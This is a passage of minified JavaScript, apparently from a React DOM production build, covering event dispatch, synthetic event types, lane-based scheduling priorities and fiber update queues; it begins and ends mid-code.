Map,At=["abort","abort",Mt,"animationEnd",Lt,"animationIteration",Nt,"animationStart","canplay","canPlay","canplaythrough","canPlayThrough","durationchange","durationChange","emptied","emptied","encrypted","encrypted","ended","ended","error","error","gotpointercapture","gotPointerCapture","load","load","loadeddata","loadedData","loadedmetadata","loadedMetadata","loadstart","loadStart","lostpointercapture","lostPointerCapture","playing","playing","progress","progress","seeking","seeking","stalled","stalled","suspend","suspend","timeupdate","timeUpdate",Zt,"transitionEnd","waiting","waiting"];function Bt(e,t){for(var n=0;n<e.length;n+=2){var a=e[n],r=e[n+1];r="on"+(r[0].toUpperCase()+r.slice(1)),zt.set(a,t),Pt.set(a,r),p(r,[a])}}(0,o.unstable_now)();var Ht=8;function Tt(e){if(0!=(1&e))return Ht=15,1;if(0!=(2&e))return Ht=14,2;if(0!=(4&e))return Ht=13,4;var t=24&e;return 0!==t?(Ht=12,t):0!=(32&e)?(Ht=11,32):0!=(t=192&e)?(Ht=10,t):0!=(256&e)?(Ht=9,256):0!=(t=3584&e)?(Ht=8,t):0!=(4096&e)?(Ht=7,4096):0!=(t=4186112&e)?(Ht=6,t):0!=(t=62914560&e)?(Ht=5,t):67108864&e?(Ht=4,67108864):0!=(134217728&e)?(Ht=3,134217728):0!=(t=805306368&e)?(Ht=2,t):0!=(1073741824&e)?(Ht=1,1073741824):(Ht=8,e)}function Rt(e,t){var n=e.pendingLanes;if(0===n)return Ht=0;var a=0,r=0,o=e.expiredLanes,i=e.suspendedLanes,l=e.pingedLanes;if(0!==o)a=o,r=Ht=15;else if(0!=(o=134217727&n)){var s=o&~i;0!==s?(a=Tt(s),r=Ht):0!=(l&=o)&&(a=Tt(l),r=Ht)}else 0!=(o=n&~i)?(a=Tt(o),r=Ht):0!==l&&(a=Tt(l),r=Ht);if(0===a)return 0;if(a=n&((0>(a=31-Dt(a))?0:1<<a)<<1)-1,0!==t&&t!==a&&0==(t&i)){if(Tt(t),r<=Ht)return t;Ht=r}if(0!==(t=e.entangledLanes))for(e=e.entanglements,t&=a;0<t;)r=1<<(n=31-Dt(t)),a|=e[n],t&=~r;return a}function Ot(e){return 0!=(e=-1073741825&e.pendingLanes)?e:1073741824&e?1073741824:0}function jt(e,t){switch(e){case 15:return 1;case 14:return 2;case 12:return 0===(e=Vt(24&~t))?jt(10,t):e;case 10:return 0===(e=Vt(192&~t))?jt(8,t):e;case 8:return 0===(e=Vt(3584&~t))&&0===(e=Vt(4186112&~t))&&(e=512),e;case 2:return 0===(t=Vt(805306368&~t))&&(t=268435456),t}throw Error(i(358,e))}function Vt(e){return e&-e}function Ft(e){for(var t=[],n=0;31>n;n++)t.push(e);return t}function Wt(e,t,n){e.pendingLanes|=t;var a=t-1;e.suspendedLanes&=a,e.pingedLanes&=a,(e=e.eventTimes)[t=31-Dt(t)]=n}var Dt=Math.clz32?Math.clz32:function(e){return 0===e?32:31-(It(e)/Ut|0)|0},It=Math.log,Ut=Math.LN2,$t=o.unstable_UserBlockingPriority,Gt=o.unstable_runWithPriority,qt=!0;function Kt(e,t,n,a){Te||Be();var r=Qt,o=Te;Te=!0;try{Ae(r,e,t,n,a)}finally{(Te=o)||Oe()}}function Xt(e,t,n,a){Gt($t,Qt.bind(null,e,t,n,a))}function Qt(e,t,n,a){var r;if(qt)if((r=0==(4&t))&&0<ot.length&&-1<ut.indexOf(e))e=mt(null,e,t,n,a),ot.push(e);else{var o=Jt(e,t,n,a);if(null===o)r&&ft(e,a);else{if(r){if(-1<ut.indexOf(e))return e=mt(o,e,t,n,a),void ot.push(e);if(function(e,t,n,a,r){switch(t){case"focusin":return it=ht(it,e,t,n,a,r),!0;case"dragenter":return lt=ht(lt,e,t,n,a,r),!0;case"mouseover":return st=ht(st,e,t,n,a,r),!0;case"pointerover":var o=r.pointerId;return pt.set(o,ht(pt.get(o)||null,e,t,n,a,r)),!0;case"gotpointercapture":return o=r.pointerId,ct.set(o,ht(ct.get(o)||null,e,t,n,a,r)),!0}return!1}(o,e,t,n,a))return;ft(e,a)}Ha(e,t,a,null,n)}}}function Jt(e,t,n,a){var r=Ce(a);if(null!==(r=nr(r))){var o=Ke(r);if(null===o)r=null;else{var i=o.tag;if(13===i){if(null!==(r=Xe(o)))return r;r=null}else if(3===i){if(o.stateNode.hydrate)return 3===o.tag?o.stateNode.containerInfo:null;r=null}else o!==r&&(r=null)}}return Ha(e,t,a,r,n),null}var Yt=null,en=null,tn=null;function nn(){if(tn)return tn;var e,t,n=en,a=n.length,r="value"in Yt?Yt.value:Yt.textContent,o=r.length;for(e=0;e<a&&n[e]===r[e];e++);var i=a-e;for(t=1;t<=i&&n[a-t]===r[o-t];t++);return tn=r.slice(e,1<t?1-t:void 0)}function an(e){var t=e.keyCode;return"charCode"in e?0===(e=e.charCode)&&13===t&&(e=13):e=t,10===e&&(e=13),32<=e||13===e?e:0}function rn(){return!0}function on(){return!1}function ln(e){function t(t,n,a,r,o){for(var i in this._reactName=t,this._targetInst=a,this.type=n,this.nativeEvent=r,this.target=o,this.currentTarget=null,e)e.hasOwnProperty(i)&&(t=e[i],this[i]=t?t(r):r[i]);return this.isDefaultPrevented=(null!=r.defaultPrevented?r.defaultPrevented:!1===r.returnValue)?rn:on,this.isPropagationStopped=on,this}return r(t.prototype,{preventDefault:function(){this.defaultPrevented=!0;var e=this.nativeEvent;e&&(e.preventDefault?e.preventDefault():"unknown"!=typeof e.returnValue&&(e.returnValue=!1),this.isDefaultPrevented=rn)},stopPropagation:function(){var e=this.nativeEvent;e&&(e.stopPropagation?e.stopPropagation():"unknown"!=typeof e.cancelBubble&&(e.cancelBubble=!0),this.isPropagationStopped=rn)},persist:function(){},isPersistent:rn}),t}var sn,pn,cn,dn={eventPhase:0,bubbles:0,cancelable:0,timeStamp:function(e){return e.timeStamp||Date.now()},defaultPrevented:0,isTrusted:0},un=ln(dn),mn=r({},dn,{view:0,detail:0}),fn=ln(mn),hn=r({},mn,{screenX:0,screenY:0,clientX:0,clientY:0,pageX:0,pageY:0,ctrlKey:0,shiftKey:0,altKey:0,metaKey:0,getModifierState:Ln,button:0,buttons:0,relatedTarget:function(e){return void 0===e.relatedTarget?e.fromElement===e.srcElement?e.toElement:e.fromElement:e.relatedTarget},movementX:function(e){return"movementX"in e?e.movementX:(e!==cn&&(cn&&"mousemove"===e.type?(sn=e.screenX-cn.screenX,pn=e.screenY-cn.screenY):pn=sn=0,cn=e),sn)},movementY:function(e){return"movementY"in e?e.movementY:pn}}),gn=ln(hn),vn=ln(r({},hn,{dataTransfer:0})),wn=ln(r({},mn,{relatedTarget:0})),bn=ln(r({},dn,{animationName:0,elapsedTime:0,pseudoElement:0})),xn=r({},dn,{clipboardData:function(e){return"clipboardData"in e?e.clipboardData:window.clipboardData}}),yn=ln(xn),kn=ln(r({},dn,{data:0})),En={Esc:"Escape",Spacebar:" ",Left:"ArrowLeft",Up:"ArrowUp",Right:"ArrowRight",Down:"ArrowDown",Del:"Delete",Win:"OS",Menu:"ContextMenu",Apps:"ContextMenu",Scroll:"ScrollLock",MozPrintableKey:"Unidentified"},Cn={8:"Backspace",9:"Tab",12:"Clear",13:"Enter",16:"Shift",17:"Control",18:"Alt",19:"Pause",20:"CapsLock",27:"Escape",32:" ",33:"PageUp",34:"PageDown",35:"End",36:"Home",37:"ArrowLeft",38:"ArrowUp",39:"ArrowRight",40:"ArrowDown",45:"Insert",46:"Delete",112:"F1",113:"F2",114:"F3",115:"F4",116:"F5",117:"F6",118:"F7",119:"F8",120:"F9",121:"F10",122:"F11",123:"F12",144:"NumLock",145:"ScrollLock",224:"Meta"},Sn={Alt:"altKey",Control:"ctrlKey",Meta:"metaKey",Shift:"shiftKey"};function Mn(e){var t=this.nativeEvent;return t.getModifierState?t.getModifierState(e):!!(e=Sn[e])&&!!t[e]}function Ln(){return Mn}var Nn=r({},mn,{key:function(e){if(e.key){var t=En[e.key]||e.key;if("Unidentified"!==t)return t}return"keypress"===e.type?13===(e=an(e))?"Enter":String.fromCharCode(e):"keydown"===e.type||"keyup"===e.type?Cn[e.keyCode]||"Unidentified":""},code:0,location:0,ctrlKey:0,shiftKey:0,altKey:0,metaKey:0,repeat:0,locale:0,getModifierState:Ln,charCode:function(e){return"keypress"===e.type?an(e):0},keyCode:function(e){return"keydown"===e.type||"keyup"===e.type?e.keyCode:0},which:function(e){return"keypress"===e.type?an(e):"keydown"===e.type||"keyup"===e.type?e.keyCode:0}}),Zn=ln(Nn),Pn=ln(r({},hn,{pointerId:0,width:0,height:0,pressure:0,tangentialPressure:0,tiltX:0,tiltY:0,twist:0,pointerType:0,isPrimary:0})),zn=ln(r({},mn,{touches:0,targetTouches:0,changedTouches:0,altKey:0,metaKey:0,ctrlKey:0,shiftKey:0,getModifierState:Ln})),An=ln(r({},dn,{propertyName:0,elapsedTime:0,pseudoElement:0})),Bn=r({},hn,{deltaX:function(e){return"deltaX"in e?e.deltaX:"wheelDeltaX"in e?-e.wheelDeltaX:0},deltaY:function(e){return"deltaY"in e?e.deltaY:"wheelDeltaY"in e?-e.wheelDeltaY:"wheelDelta"in e?-e.wheelDelta:0},deltaZ:0,deltaMode:0}),Hn=ln(Bn),Tn=[9,13,27,32],Rn=d&&"CompositionEvent"in window,On=null;d&&"documentMode"in document&&(On=document.documentMode);var jn=d&&"TextEvent"in window&&!On,Vn=d&&(!Rn||On&&8<On&&11>=On),Fn=String.fromCharCode(32),Wn=!1;function Dn(e,t){switch(e){case"keyup":return-1!==Tn.indexOf(t.keyCode);case"keydown":return 229!==t.keyCode;case"keypress":case"mousedown":case"focusout":return!0;default:return!1}}function In(e){return"object"==typeof(e=e.detail)&&"data"in e?e.data:null}var Un=!1,$n={color:!0,date:!0,datetime:!0,"datetime-local":!0,email:!0,month:!0,number:!0,password:!0,range:!0,search:!0,tel:!0,text:!0,time:!0,url:!0,week:!0};function Gn(e){var t=e&&e.nodeName&&e.nodeName.toLowerCase();return"input"===t?!!$n[e.type]:"textarea"===t}function qn(e,t,n,a){Ze(a),0<(t=Ra(t,"onChange")).length&&(n=new un("onChange","change",null,n,a),e.push({event:n,listeners:t}))}var Kn=null,Xn=null;function Qn(e){Na(e,0)}function Jn(e){if(Q(rr(e)))return e}function Yn(e,t){if("change"===e)return t}var ea=!1;if(d){var ta;if(d){var na="oninput"in document;if(!na){var aa=document.createElement("div");aa.setAttribute("oninput","return;"),na="function"==typeof aa.oninput}ta=na}else ta=!1;ea=ta&&(!document.documentMode||9<document.documentMode)}function ra(){Kn&&(Kn.detachEvent("onpropertychange",oa),Xn=Kn=null)}function oa(e){if("value"===e.propertyName&&Jn(Xn)){var t=[];if(qn(t,Xn,e,Ce(e)),e=Qn,Te)e(t);else{Te=!0;try{ze(e,t)}finally{Te=!1,Oe()}}}}function ia(e,t,n){"focusin"===e?(ra(),Xn=n,(Kn=t).attachEvent("onpropertychange",oa)):"focusout"===e&&ra()}function la(e){if("selectionchange"===e||"keyup"===e||"keydown"===e)return Jn(Xn)}function sa(e,t){if("click"===e)return Jn(t)}function pa(e,t){if("input"===e||"change"===e)return Jn(t)}var ca="function"==typeof Object.is?Object.is:function(e,t){return e===t&&(0!==e||1/e==1/t)||e!=e&&t!=t},da=Object.prototype.hasOwnProperty;function ua(e,t){if(ca(e,t))return!0;if("object"!=typeof e||null===e||"object"!=typeof t||null===t)return!1;var n=Object.keys(e),a=Object.keys(t);if(n.length!==a.length)return!1;for(a=0;a<n.length;a++)if(!da.call(t,n[a])||!ca(e[n[a]],t[n[a]]))return!1;return!0}function ma(e){for(;e&&e.firstChild;)e=e.firstChild;return e}function fa(e,t){var n,a=ma(e);for(e=0;a;){if(3===a.nodeType){if(n=e+a.textContent.length,e<=t&&n>=t)return{node:a,offset:t-e};e=n}e:{for(;a;){if(a.nextSibling){a=a.nextSibling;break e}a=a.parentNode}a=void 0}a=ma(a)}}function ha(e,t){return!(!e||!t)&&(e===t||(!e||3!==e.nodeType)&&(t&&3===t.nodeType?ha(e,t.parentNode):"contains"in e?e.contains(t):!!e.compareDocumentPosition&&!!(16&e.compareDocumentPosition(t))))}function ga(){for(var e=window,t=J();t instanceof e.HTMLIFrameElement;){try{var n="string"==typeof t.contentWindow.location.href}catch(e){n=!1}if(!n)break;t=J((e=t.contentWindow).document)}return t}function va(e){var t=e&&e.nodeName&&e.nodeName.toLowerCase();return t&&("input"===t&&("text"===e.type||"search"===e.type||"tel"===e.type||"url"===e.type||"password"===e.type)||"textarea"===t||"true"===e.contentEditable)}var _a=d&&"documentMode"in document&&11>=document.documentMode,wa=null,ba=null,xa=null,ya=!1;function ka(e,t,n){var a=n.window===n?n.document:9===n.nodeType?n:n.ownerDocument;ya||null==wa||wa!==J(a)||(a="selectionStart"in(a=wa)&&va(a)?{start:a.selectionStart,end:a.selectionEnd}:{anchorNode:(a=(a.ownerDocument&&a.ownerDocument.defaultView||window).getSelection()).anchorNode,anchorOffset:a.anchorOffset,focusNode:a.focusNode,focusOffset:a.focusOffset},xa&&ua(xa,a)||(xa=a,0<(a=Ra(ba,"onSelect")).length&&(t=new un("onSelect","select",null,t,n),e.push({event:t,listeners:a}),t.target=wa)))}Bt("cancel cancel click click close close contextmenu contextMenu copy copy cut cut auxclick auxClick dblclick doubleClick dragend dragEnd dragstart dragStart drop drop focusin focus focusout blur input input invalid invalid keydown keyDown keypress keyPress keyup keyUp mousedown mouseDown mouseup mouseUp paste paste pause pause play play pointercancel pointerCancel pointerdown pointerDown pointerup pointerUp ratechange rateChange reset reset seeked seeked submit submit touchcancel touchCancel touchend touchEnd touchstart touchStart volumechange volumeChange".split(" "),0),Bt("drag drag dragenter dragEnter dragexit dragExit dragleave dragLeave dragover dragOver mousemove mouseMove mouseout mouseOut mouseover mouseOver pointermove pointerMove pointerout pointerOut pointerover pointerOver scroll scroll toggle toggle touchmove touchMove wheel wheel".split(" "),1),Bt(At,2);for(var Ea="change selectionchange textInput compositionstart compositionend compositionupdate".split(" "),Ca=0;Ca<Ea.length;Ca++)zt.set(Ea[Ca],0);c("onMouseEnter",["mouseout","mouseover"]),c("onMouseLeave",["mouseout","mouseover"]),c("onPointerEnter",["pointerout","pointerover"]),c("onPointerLeave",["pointerout","pointerover"]),p("onChange","change click focusin focusout input keydown keyup selectionchange".split(" ")),p("onSelect","focusout contextmenu dragend focusin keydown keyup mousedown mouseup selectionchange".split(" ")),p("onBeforeInput",["compositionend","keypress","textInput","paste"]),p("onCompositionEnd","compositionend focusout keydown keypress keyup mousedown".split(" ")),p("onCompositionStart","compositionstart focusout keydown keypress keyup mousedown".split(" ")),p("onCompositionUpdate","compositionupdate focusout keydown keypress keyup mousedown".split(" "));var Sa="abort canplay canplaythrough durationchange emptied encrypted ended error loadeddata loadedmetadata loadstart pause play playing progress ratechange seeked seeking stalled suspend timeupdate volumechange waiting".split(" "),Ma=new Set("cancel close invalid load scroll toggle".split(" ").concat(Sa));function La(e,t,n){var a=e.type||"unknown-event";e.currentTarget=n,function(e,t,n,a,r,o,l,s,p){if(qe.apply(this,arguments),De){if(!De)throw Error(i(198));var c=Ie;De=!1,Ie=null,Ue||(Ue=!0,$e=c)}}(a,t,void 0,e),e.currentTarget=null}function Na(e,t){t=0!=(4&t);for(var n=0;n<e.length;n++){var a=e[n],r=a.event;a=a.listeners;e:{var o=void 0;if(t)for(var i=a.length-1;0<=i;i--){var l=a[i],s=l.instance,p=l.currentTarget;if(l=l.listener,s!==o&&r.isPropagationStopped())break e;La(r,l,p),o=s}else for(i=0;i<a.length;i++){if(s=(l=a[i]).instance,p=l.currentTarget,l=l.listener,s!==o&&r.isPropagationStopped())break e;La(r,l,p),o=s}}}if(Ue)throw e=$e,Ue=!1,$e=null,e}function Za(e,t){var n=ir(t),a=e+"__bubble";n.has(a)||(Ba(t,e,2,!1),n.add(a))}var Pa="_reactListening"+Math.random().toString(36).slice(2);function za(e){e[Pa]||(e[Pa]=!0,l.forEach((function(t){Ma.has(t)||Aa(t,!1,e,null),Aa(t,!0,e,null)})))}function Aa(e,t,n,a){var r=4<arguments.length&&void 0!==arguments[4]?arguments[4]:0,o=n;if("selectionchange"===e&&9!==n.nodeType&&(o=n.ownerDocument),null!==a&&!t&&Ma.has(e)){if("scroll"!==e)return;r|=2,o=a}var i=ir(o),l=e+"__"+(t?"capture":"bubble");i.has(l)||(t&&(r|=4),Ba(o,e,r,t),i.add(l))}function Ba(e,t,n,a){var r=zt.get(t);switch(void 0===r?2:r){case 0:r=Kt;break;case 1:r=Xt;break;default:r=Qt}n=r.bind(null,t,n,e),r=void 0,!Ve||"touchstart"!==t&&"touchmove"!==t&&"wheel"!==t||(r=!0),a?void 0!==r?e.addEventListener(t,n,{capture:!0,passive:r}):e.addEventListener(t,n,!0):void 0!==r?e.addEventListener(t,n,{passive:r}):e.addEventListener(t,n,!1)}function Ha(e,t,n,a,r){var o=a;if(0==(1&t)&&0==(2&t)&&null!==a)e:for(;;){if(null===a)return;var i=a.tag;if(3===i||4===i){var l=a.stateNode.containerInfo;if(l===r||8===l.nodeType&&l.parentNode===r)break;if(4===i)for(i=a.return;null!==i;){var s=i.tag;if((3===s||4===s)&&((s=i.stateNode.containerInfo)===r||8===s.nodeType&&s.parentNode===r))return;i=i.return}for(;null!==l;){if(null===(i=nr(l)))return;if(5===(s=i.tag)||6===s){a=o=i;continue e}l=l.parentNode}}a=a.return}!function(e,t,n){if(Re)return e();Re=!0;try{return He(e,t,n)}finally{Re=!1,Oe()}}((function(){var a=o,r=Ce(n),i=[];e:{var l=Pt.get(e);if(void 0!==l){var s=un,p=e;switch(e){case"keypress":if(0===an(n))break e;case"keydown":case"keyup":s=Zn;break;case"focusin":p="focus",s=wn;break;case"focusout":p="blur",s=wn;break;case"beforeblur":case"afterblur":s=wn;break;case"click":if(2===n.button)break e;case"auxclick":case"dblclick":case"mousedown":case"mousemove":case"mouseup":case"mouseout":case"mouseover":case"contextmenu":s=gn;break;case"drag":case"dragend":case"dragenter":case"dragexit":case"dragleave":case"dragover":case"dragstart":case"drop":s=vn;break;case"touchcancel":case"touchend":case"touchmove":case"touchstart":s=zn;break;case Mt:case Lt:case Nt:s=bn;break;case Zt:s=An;break;case"scroll":s=fn;break;case"wheel":s=Hn;break;case"copy":case"cut":case"paste":s=yn;break;case"gotpointercapture":case"lostpointercapture":case"pointercancel":case"pointerdown":case"pointermove":case"pointerout":case"pointerover":case"pointerup":s=Pn}var c=0!=(4&t),d=!c&&"scroll"===e,u=c?null!==l?l+"Capture":null:l;c=[];for(var m,f=a;null!==f;){var h=(m=f).stateNode;if(5===m.tag&&null!==h&&(m=h,null!==u&&null!=(h=je(f,u))&&c.push(Ta(f,h,m))),d)break;f=f.return}0<c.length&&(l=new s(l,p,null,n,r),i.push({event:l,listeners:c}))}}if(0==(7&t)){if(s="mouseout"===e||"pointerout"===e,(!(l="mouseover"===e||"pointerover"===e)||0!=(16&t)||!(p=n.relatedTarget||n.fromElement)||!nr(p)&&!p[er])&&(s||l)&&(l=r.window===r?r:(l=r.ownerDocument)?l.defaultView||l.parentWindow:window,s?(s=a,null!==(p=(p=n.relatedTarget||n.toElement)?nr(p):null)&&(p!==(d=Ke(p))||5!==p.tag&&6!==p.tag)&&(p=null)):(s=null,p=a),s!==p)){if(c=gn,h="onMouseLeave",u="onMouseEnter",f="mouse","pointerout"!==e&&"pointerover"!==e||(c=Pn,h="onPointerLeave",u="onPointerEnter",f="pointer"),d=null==s?l:rr(s),m=null==p?l:rr(p),(l=new c(h,f+"leave",s,n,r)).target=d,l.relatedTarget=m,h=null,nr(r)===a&&((c=new c(u,f+"enter",p,n,r)).target=m,c.relatedTarget=d,h=c),d=h,s&&p)e:{for(u=p,f=0,m=c=s;m;m=Oa(m))f++;for(m=0,h=u;h;h=Oa(h))m++;for(;0<f-m;)c=Oa(c),f--;for(;0<m-f;)u=Oa(u),m--;for(;f--;){if(c===u||null!==u&&c===u.alternate)break e;c=Oa(c),u=Oa(u)}c=null}else c=null;null!==s&&ja(i,l,s,c,!1),null!==p&&null!==d&&ja(i,d,p,c,!0)}if("select"===(s=(l=a?rr(a):window).nodeName&&l.nodeName.toLowerCase())||"input"===s&&"file"===l.type)var g=Yn;else if(Gn(l))if(ea)g=pa;else{g=la;var v=ia}else(s=l.nodeName)&&"input"===s.toLowerCase()&&("checkbox"===l.type||"radio"===l.type)&&(g=sa);switch(g&&(g=g(e,a))?qn(i,g,n,r):(v&&v(e,l,a),"focusout"===e&&(v=l._wrapperState)&&v.controlled&&"number"===l.type&&re(l,"number",l.value)),v=a?rr(a):window,e){case"focusin":(Gn(v)||"true"===v.contentEditable)&&(wa=v,ba=a,xa=null);break;case"focusout":xa=ba=wa=null;break;case"mousedown":ya=!0;break;case"contextmenu":case"mouseup":case"dragend":ya=!1,ka(i,n,r);break;case"selectionchange":if(_a)break;case"keydown":case"keyup":ka(i,n,r)}var _;if(Rn)e:{switch(e){case"compositionstart":var w="onCompositionStart";break e;case"compositionend":w="onCompositionEnd";break e;case"compositionupdate":w="onCompositionUpdate";break e}w=void 0}else Un?Dn(e,n)&&(w="onCompositionEnd"):"keydown"===e&&229===n.keyCode&&(w="onCompositionStart");w&&(Vn&&"ko"!==n.locale&&(Un||"onCompositionStart"!==w?"onCompositionEnd"===w&&Un&&(_=nn()):(en="value"in(Yt=r)?Yt.value:Yt.textContent,Un=!0)),0<(v=Ra(a,w)).length&&(w=new kn(w,e,null,n,r),i.push({event:w,listeners:v}),(_||null!==(_=In(n)))&&(w.data=_))),(_=jn?function(e,t){switch(e){case"compositionend":return In(t);case"keypress":return 32!==t.which?null:(Wn=!0,Fn);case"textInput":return(e=t.data)===Fn&&Wn?null:e;default:return null}}(e,n):function(e,t){if(Un)return"compositionend"===e||!Rn&&Dn(e,t)?(e=nn(),tn=en=Yt=null,Un=!1,e):null;switch(e){case"paste":default:return null;case"keypress":if(!(t.ctrlKey||t.altKey||t.metaKey)||t.ctrlKey&&t.altKey){if(t.char&&1<t.char.length)return t.char;if(t.which)return String.fromCharCode(t.which)}return null;case"compositionend":return Vn&&"ko"!==t.locale?null:t.data}}(e,n))&&0<(a=Ra(a,"onBeforeInput")).length&&(r=new kn("onBeforeInput","beforeinput",null,n,r),i.push({event:r,listeners:a}),r.data=_)}Na(i,t)}))}function Ta(e,t,n){return{instance:e,listener:t,currentTarget:n}}function Ra(e,t){for(var n=t+"Capture",a=[];null!==e;){var r=e,o=r.stateNode;5===r.tag&&null!==o&&(r=o,null!=(o=je(e,n))&&a.unshift(Ta(e,o,r)),null!=(o=je(e,t))&&a.push(Ta(e,o,r))),e=e.return}return a}function Oa(e){if(null===e)return null;do{e=e.return}while(e&&5!==e.tag);return e||null}function ja(e,t,n,a,r){for(var o=t._reactName,i=[];null!==n&&n!==a;){var l=n,s=l.alternate,p=l.stateNode;if(null!==s&&s===a)break;5===l.tag&&null!==p&&(l=p,r?null!=(s=je(n,o))&&i.unshift(Ta(n,s,l)):r||null!=(s=je(n,o))&&i.push(Ta(n,s,l))),n=n.return}0!==i.length&&e.push({event:t,listeners:i})}function Va(){}var Fa=null,Wa=null;function Da(e,t){switch(e){case"button":case"input":case"select":case"textarea":return!!t.autoFocus}return!1}function Ia(e,t){return"textarea"===e||"option"===e||"noscript"===e||"string"==typeof t.children||"number"==typeof t.children||"object"==typeof t.dangerouslySetInnerHTML&&null!==t.dangerouslySetInnerHTML&&null!=t.dangerouslySetInnerHTML.__html}var Ua="function"==typeof setTimeout?setTimeout:void 0,$a="function"==typeof clearTimeout?clearTimeout:void 0;function Ga(e){(1===e.nodeType||9===e.nodeType&&null!=(e=e.body))&&(e.textContent="")}function qa(e){for(;null!=e;e=e.nextSibling){var t=e.nodeType;if(1===t||3===t)break}return e}function Ka(e){e=e.previousSibling;for(var t=0;e;){if(8===e.nodeType){var n=e.data;if("$"===n||"$!"===n||"$?"===n){if(0===t)return e;t--}else"/$"===n&&t++}e=e.previousSibling}return null}var Xa=0,Qa=Math.random().toString(36).slice(2),Ja="__reactFiber$"+Qa,Ya="__reactProps$"+Qa,er="__reactContainer$"+Qa,tr="__reactEvents$"+Qa;function nr(e){var t=e[Ja];if(t)return t;for(var n=e.parentNode;n;){if(t=n[er]||n[Ja]){if(n=t.alternate,null!==t.child||null!==n&&null!==n.child)for(e=Ka(e);null!==e;){if(n=e[Ja])return n;e=Ka(e)}return t}n=(e=n).parentNode}return null}function ar(e){return!(e=e[Ja]||e[er])||5!==e.tag&&6!==e.tag&&13!==e.tag&&3!==e.tag?null:e}function rr(e){if(5===e.tag||6===e.tag)return e.stateNode;throw Error(i(33))}function or(e){return e[Ya]||null}function ir(e){var t=e[tr];return void 0===t&&(t=e[tr]=new Set),t}var lr=[],sr=-1;function pr(e){return{current:e}}function cr(e){0>sr||(e.current=lr[sr],lr[sr]=null,sr--)}function dr(e,t){sr++,lr[sr]=e.current,e.current=t}var ur={},mr=pr(ur),fr=pr(!1),hr=ur;function gr(e,t){var n=e.type.contextTypes;if(!n)return ur;var a=e.stateNode;if(a&&a.__reactInternalMemoizedUnmaskedChildContext===t)return a.__reactInternalMemoizedMaskedChildContext;var r,o={};for(r in n)o[r]=t[r];return a&&((e=e.stateNode).__reactInternalMemoizedUnmaskedChildContext=t,e.__reactInternalMemoizedMaskedChildContext=o),o}function vr(e){return null!=e.childContextTypes}function _r(){cr(fr),cr(mr)}function wr(e,t,n){if(mr.current!==ur)throw Error(i(168));dr(mr,t),dr(fr,n)}function br(e,t,n){var a=e.stateNode;if(e=t.childContextTypes,"function"!=typeof a.getChildContext)return n;for(var o in a=a.getChildContext())if(!(o in e))throw Error(i(108,G(t)||"Unknown",o));return r({},n,a)}function xr(e){return e=(e=e.stateNode)&&e.__reactInternalMemoizedMergedChildContext||ur,hr=mr.current,dr(mr,e),dr(fr,fr.current),!0}function yr(e,t,n){var a=e.stateNode;if(!a)throw Error(i(169));n?(e=br(e,t,hr),a.__reactInternalMemoizedMergedChildContext=e,cr(fr),cr(mr),dr(mr,e)):cr(fr),dr(fr,n)}var kr=null,Er=null,Cr=o.unstable_runWithPriority,Sr=o.unstable_scheduleCallback,Mr=o.unstable_cancelCallback,Lr=o.unstable_shouldYield,Nr=o.unstable_requestPaint,Zr=o.unstable_now,Pr=o.unstable_getCurrentPriorityLevel,zr=o.unstable_ImmediatePriority,Ar=o.unstable_UserBlockingPriority,Br=o.unstable_NormalPriority,Hr=o.unstable_LowPriority,Tr=o.unstable_IdlePriority,Rr={},Or=void 0!==Nr?Nr:function(){},jr=null,Vr=null,Fr=!1,Wr=Zr(),Dr=1e4>Wr?Zr:function(){return Zr()-Wr};function Ir(){switch(Pr()){case zr:return 99;case Ar:return 98;case Br:return 97;case Hr:return 96;case Tr:return 95;default:throw Error(i(332))}}function Ur(e){switch(e){case 99:return zr;case 98:return Ar;case 97:return Br;case 96:return Hr;case 95:return Tr;default:throw Error(i(332))}}function $r(e,t){return e=Ur(e),Cr(e,t)}function Gr(e,t,n){return e=Ur(e),Sr(e,t,n)}function qr(){if(null!==Vr){var e=Vr;Vr=null,Mr(e)}Kr()}function Kr(){if(!Fr&&null!==jr){Fr=!0;var e=0;try{var t=jr;$r(99,(function(){for(;e<t.length;e++){var n=t[e];do{n=n(!0)}while(null!==n)}})),jr=null}catch(t){throw null!==jr&&(jr=jr.slice(e+1)),Sr(zr,qr),t}finally{Fr=!1}}}var Xr=x.ReactCurrentBatchConfig;function Qr(e,t){if(e&&e.defaultProps){for(var n in t=r({},t),e=e.defaultProps)void 0===t[n]&&(t[n]=e[n]);return t}return t}var Jr=pr(null),Yr=null,eo=null,to=null;function no(){to=eo=Yr=null}function ao(e){var t=Jr.current;cr(Jr),e.type._context._currentValue=t}function ro(e,t){for(;null!==e;){var n=e.alternate;if((e.childLanes&t)===t){if(null===n||(n.childLanes&t)===t)break;n.childLanes|=t}else e.childLanes|=t,null!==n&&(n.childLanes|=t);e=e.return}}function oo(e,t){Yr=e,to=eo=null,null!==(e=e.dependencies)&&null!==e.firstContext&&(0!=(e.lanes&t)&&(Ri=!0),e.firstContext=null)}function io(e,t){if(to!==e&&!1!==t&&0!==t)if("number"==typeof t&&1073741823!==t||(to=e,t=1073741823),t={context:e,observedBits:t,next:null},null===eo){if(null===Yr)throw Error(i(308));eo=t,Yr.dependencies={lanes:0,firstContext:t,responders:null}}else eo=eo.next=t;return e._currentValue}var lo=!1;function so(e){e.updateQueue={baseState:e.memoizedState,firstBaseUpdate:null,lastBaseUpdate:null,shared:{pending:null},effects:null}}function po(e,t){e=e.updateQueue,t.updateQueue===e&&(t.updateQueue={baseState:e.baseState,firstBaseUpdate:e.firstBaseUpdate,lastBaseUpdate:e.lastBaseUpdate,shared:e.shared,effects:e.effects})}function co(e,t){return{eventTime:e,lane:t,tag:0,payload:null,callback:null,next:null}}function uo(e,t){if(null!==(e=e.updateQueue)){var n=(e=e.shared).pending;null===n?t.next=t:(t.next=n.next,n.next=t),e.pending=t}}function mo(e,t){var n=e.updateQueue,a=e.alternate;if(null!==a&&n===(a=a.updateQueue)){var r=null,o=null;if(null!==(n=n.firstBaseUpdate)){do{var i={eventTime:n.eventTime,lane:n.lane,tag:n.tag,payload:n.payload,callback:n.callback,next:null};null===o?r=o=i:o=o.next=i,n=n.next}while(null!==n);null===o?r=o=t:o=o.next=t}else r=o=t;return n={baseState:a.baseState,firstBaseUpdate:r,lastBaseUpdate:o,shared:a.shared,effects:a.effects},void(e.updateQueue=n)}null===(e=n.lastBaseUpdate)?n.firstBaseUpdate=t:e.next=t,n.lastBaseUpdate=t}function fo(e,t,n,a){var o=e.updateQueue;lo=!1;var i=o.firstBaseUpdate,l=o.lastBaseUpdate,s=o.shared.pending;if(null!==s){o.shared.pending=null;var 